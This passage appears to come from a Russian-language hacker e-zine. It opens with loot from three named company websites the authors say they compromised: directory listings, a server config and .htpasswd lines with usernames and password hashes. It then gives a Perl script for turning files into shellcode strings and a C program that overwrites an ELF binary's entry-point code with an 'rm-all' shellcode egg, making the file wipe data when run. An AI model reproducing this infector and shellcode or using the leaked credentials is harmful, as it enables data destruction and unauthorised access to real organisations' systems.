`` All the small things ``

 [+]  some fuckin shit
  i
  i  За последнее время перед релизом этого номера мы потеряли root-access
  i  к сайтам,  перечисленным здесь...  Не получилось сделать там зеркала,
  i  а жаль ((
  i
  i ======================
  i [1] www.netsecurity.at
  i ======================
  i About: No comments... =))
  i
  i  /www/ contents:
  i
  i _private                DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr--r--
  i _vti_bin                DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr-xr-x
  i _vti_cnf                DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr-xr-x
  i _vti_log                DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr-xr-x
  i _vti_pvt                DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr-xr-x
  i _vti_txt                DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr-xr-x
  i download                DIR  07/09/03 08:54   ne005vmo/ne005vmo   drwxr-xr-x
  i error                   DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr-xr-x
  i folder                  DIR  09/04/02 09:08   ne005vmo/ne005vmo   drwxr-xr-x
  i hgn                     DIR  07/09/03 10:45   ne005vmo/ne005vmo   drwxr-xr-x
  i neu                     DIR  14/03/02 16:23   ne005vmo/ne005vmo   drwxr-xr-x
  i neu08042002             DIR  08/04/02 16:22   ne005vmo/ne005vmo   drwxr-xr-x
  i pix                     DIR  30/07/02 09:30   ne005vmo/ne005vmo   drwxr-xr-x
  i private                 DIR  09/08/01 15:49   ne005vmo/ne005vmo   drwxr-xr-x
  i .htaccess          355  т р  09/08/01 15:49   ne005vmo/ne005vmo   -rw-r--r--
  i _vti_inf.html    1 716  т р  09/08/01 15:49   ne005vmo/ne005vmo   -rw-r--r--
  i agb.pdf         34 039  т р  25/02/02 11:24   ne005vmo/ne005vmo   -rw-r--r--
  i format.css       2 780  т р  14/03/02 14:44   ne005vmo/ne005vmo   -rw-r--r--
  i hgn.html           466  т р  07/09/03 08:56   ne005vmo/ne005vmo   -rw-r--r--
  i index.html       3 986  т р  21/05/02 17:52   ne005vmo/ne005vmo   -rw-r--r--
  i mail.html          436  т р  08/04/02 17:52   ne005vmo/ne005vmo   -rw-r--r--
  i profile.html     4 833  т р  30/07/02 09:30   ne005vmo/ne005vmo   -rw-r--r--
  i sectest.php      3 600  т р  09/04/02 09:53   ne005vmo/ne005vmo   -rw-r--r--
  i SYNHaas.zip 61 502 236  т р  02/11/03 23:41   ne005vmo/ne005vmo   -rw-r--r--
  i
  i  there's no any zeroday wahreezz, god dammit (
  i
  i  cat /www/conf/.htpasswd
  i  ne005vmo:qaEv4urOG6tXc
  i
  i ================
  i [2] cis-cert.org
  i ================
  i
  i  About: "CIS - Certification & Information Security Services GmbH"
  i
  i # start cis-cert.com
  i <VirtualHost 213.229.60.12>
  i   #ThrottlePolicy none
  i   ServerAdmin [email protected]
  i   # ProxyPass  /java  http://java.inode.at:8080/ci002vmo
  i   # ProxyPassReverse  /java  http://java.inode.at:8080/ci002vmo
  i   DocumentRoot /home/ci002vmo/www/home
  i   ServerName www.cis-cert.com
  i   ServerAlias *cis-cert.com ci002vmo.monster.inode.at *cis-cert.at *cis-cert.de *cis-cert.ch
  i   ScriptAlias /cgi-bin/ /home/ci002vmo/www/cgi/
  i   ErrorDocument 400 /error/error400.php
  i   ErrorDocument 401 /error/error401.php
  i   ErrorDocument 402 /error/error402.php
  i   ErrorDocument 403 /error/error403.php
  i   ErrorDocument 404 /error/error404.php
  i   ErrorDocument 500 /error/error500.php
  i </VirtualHost>
  i # end cis-cert.com
  i 
  i _error            DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr-xr-x
  i _private          DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr--r--
  i _test             DIR  31/05/04 11:18   ci002vmo/ci002vmo   drwxr-xr-x
  i _vti_bin          DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr-xr-x
  i _vti_cnf          DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr-xr-x
  i _vti_log          DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr-xr-x
  i _vti_pvt          DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr-xr-x
  i _vti_txt          DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr-xr-x
  i aktuell           DIR  17/06/04 15:25   ci002vmo/ci002vmo   drwxr-xr-x
  i aus               DIR  02/03/04 15:58   ci002vmo/ci002vmo   drwxr-xr-x
  i common            DIR  18/10/02 12:28   ci002vmo/ci002vmo   drwxr-xr-x
  i error             DIR  21/10/02 11:04   ci002vmo/ci002vmo   drwxr-xr-x
  i gfx               DIR  03/07/03 16:59   ci002vmo/ci002vmo   drwxr-xr-x
  i images            DIR  20/03/01 16:08   ci002vmo/ci002vmo   drwxr-xr-x
  i index             DIR  03/07/03 16:52   ci002vmo/ci002vmo   drwxr-xr-x
  i newsletter        DIR  02/06/04 13:28   ci002vmo/ci002vmo   drwxr-xr-x
  i private           DIR  02/06/04 13:49   ci002vmo/ci002vmo   drwxr-xr-x
  i sec               DIR  18/10/02 12:29   ci002vmo/ci002vmo   drwxr-xr-x
  i seminare          DIR  28/03/03 12:55   ci002vmo/ci002vmo   drwxr-xr-x
  i syszert           DIR  28/01/03 12:19   ci002vmo/ci002vmo   drwxr-xr-x
  i wir               DIR  18/10/02 12:29   ci002vmo/ci002vmo   drwxr-xr-x
  i .htaccess     61  т р  23/01/03 16:47   ci002vmo/ci002vmo   -rw-r--r--
  i
  i cat /home/cis-cert/www/conf/.htpasswd
  i
  i ci002vmo:oNSOowz/eI3Vg
  i admin:oNC.Y5lryOnIQ
  i
  i
  i ==============
  i [3] 1stcss.com
  i ==============
  i
  i About: "1st Choice Security Services Limited is a privately owned security
  i    company-providing standard and specialist manned guarding services to a
  i    diverse customer base."
  i
  i  ls /home/
  i
  i easilylogo.jpg
  i hbmcsmi60rj9
  i images
  i index.html
  i left_frame.html
  i main_frame.html
  i page_format.css
  i pages
  i postinfo.html
  i _private
  i top_frame.html
  i _vti_bin
  i _vti_cnf
  i _vti_inf.html 
  i _vti_log 
  i _vti_pvt 
  i _vti_txt 
  i
  i
  i
 [+]  malware developing t00l
  i
  i #!/usr/bin/perl
  i 
  i #################################################################
  i #        conva.pl - converts any file in hex-string.
  i #
  i # xmpl:
  i #
  i # $ cat lol
  i # abcd
  i # $ hexdump lol > install
  i # $ ./conva.pl
  i # $ cat outro
  i # .ascii "\x61\x62\x63\x64"
  i # $ and so on with any file
  i #
  i # if $asm == 0 it converts binary file in standart C format,
  i # else - to linux assembler's string .ascii "\x..\x....." etc
  i #
  i #################################################################
  i
  i $asm = 0;
  i 
  i
  i open(A,"install");
  i @list = <A>;
  i close(A);
  i 
  i open(NEW,">outro");
  i 
  i for ($i=0; $i < $#list; $i++){
  i 
  i $tmp = $list[$i];
  i chomp $tmp;
  i 
  i $str = "";
  i 
  i ($k,$a,$b,$c,$d,$e,$f,$g,$h) = split(/ /,$tmp);
  i 
  i $a =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$a);
  i $str .= "\\x$bp\\x$ap";
  i 
  i $b =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$b);
  i $str .= "\\x$bp\\x$ap";
  i 
  i $c =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$c);
  i $str .= "\\x$bp\\x$ap";
  i 
  i $d =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$d);
  i $str .= "\\x$bp\\x$ap";
  i 
  i $e =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$e);
  i $str .= "\\x$bp\\x$ap";
  i 
  i $f =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$f);
  i $str .= "\\x$bp\\x$ap";
  i 
  i $g =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$g);
  i $str .= "\\x$bp\\x$ap";
  i 
  i $h =~ s/([\da-f][\da-f])/sprintf("z%s",$1)/egi;
  i ($junk,$ap,$bp) = split(/z/,$h);
  i $str .= "\\x$bp\\x$ap";
  i 
  i if ($asm > 0){ $new = ".ascii \"$str\"\n"; }
  i if ($asm == 0){ $new = "\"$str\"\n"; }
  i 
  i print NEW "$new";
  i }
  i 
  i close(NEW);
  i # eof
  i
 [+]  merry-x-mass exploits infection tool
  i
  i
  i  #include <stdio.h>
  i  #include <fcntl.h>
  i  #include <sys/stat.h>
  i  #include <sys/types.h>
  i  
  i  /* rm-all egg for linux [x86] */
  i  
  i  char egg_code[] =
  i  "\x31\xc0\xb0\x02\xcd\x80\x99\x52\x66\xbb\x81\x8e\x66\x81\xeb\x0f"
  i  "\x21\x66\x53\x66\x68\x6e\x2f\x68\x2f\x2f\x62\x69\x89\xe3\x66\x52"
  i  "\x66\xb8\x1f\x5e\x66\x05\x0e\x08\x66\x50\x89\xe6\x66\x52\x66\xb8"
  i  "\x1f\x41\x66\x05\x0e\x31\x66\x50\x89\xe1\x52\x6a\x2f\x89\xe0\x52"
  i  "\x50\x56\x51\x53\x89\xe1\x6a\x0b\x58\xcd\x80";
  i  
  i  
  i  int main(int argc, char *argv[])
  i  {
  i    int fd;
  i    unsigned long entry;
  i    struct stat file;
  i    
  i    if (argc < 2){
  i       printf("Usage: %s  <file_to_infect>\n",argv[0]);
  i       return -1;
  i    }
  i  
  i    printf("[+] opening target file\n");
  i    fd = open(argv[1], O_RDWR);
  i  
  i    if (fd < 0){
  i       printf("[-] cant open file %s\n",argv[1]);
  i       return -1;
  i    }
  i  
  i    printf("[+] reading entry point from elf-header\n");
  i    lseek(fd, 0x18, SEEK_SET);
  i    read(fd, &entry, 4);
  i  
  i    printf("[+] recounting real offset to .text section\n");
  i    entry = entry - 0x08048000;
  i  
  i    fstat(fd, &file);
  i    
  i    if (entry > (file.st_size - 0x1c - sizeof(egg_code))){
  i       printf("[-] file too small\n");
  i       return -1;
  i    }
  i  
  i    printf("[+] offset to code: 0x%x\n",entry);
  i  
  i    lseek(fd, entry, SEEK_SET);
  i    printf("[+] injecting code...\n");
  i    write(fd, &egg_code, sizeof(egg_code) - 1);
  i    printf("[+] done\n");
  i    close(fd);
  i  
  i    return 1;
  i  }
  i  
 [~]